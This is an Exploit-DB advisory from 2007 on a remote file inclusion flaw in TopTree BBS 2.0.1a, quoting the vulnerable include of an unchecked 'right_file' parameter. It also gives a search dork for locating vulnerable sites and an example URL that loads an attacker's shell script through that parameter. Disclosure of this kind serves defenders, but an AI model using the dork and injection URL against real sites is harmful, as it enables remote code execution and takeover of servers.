PHP TopTree BBS 2.0.1a - 'right_file' Remote File Inclusion

EDB-ID:

3854


Platform:

PHP

Published:

2007-05-04

##############################################################################################
##############################################################################################
#TopTree <= 2.01a Remote File Inclusion Vulnerability
#
#Dork:"Powered by DVHome.cn"
#
#Vuln Code
###################################################################################
#
#ERROR:templates/default/tpl_message.php
#
# <?php include ($right_file); ?>
#
#BUG:
#
#Example:http://site.com/path/templates/default/tpl_message.php?right_file=[[Sh3LL
Script]]
#
#Script Download
#############################################################################
#http://sourceforge.net/project/showfiles.php?group_id=169574&package_id=193438&release_id=426108
#
#Original W3b
Site############################################################################
#
#http://www.dvhome.cn
#
#Special Thanks:##### x0r0n ##### ajan ##### siircicocuk
#####################################
##############################################################################################
##############################################################################################

# milw0rm.com [2007-05-04]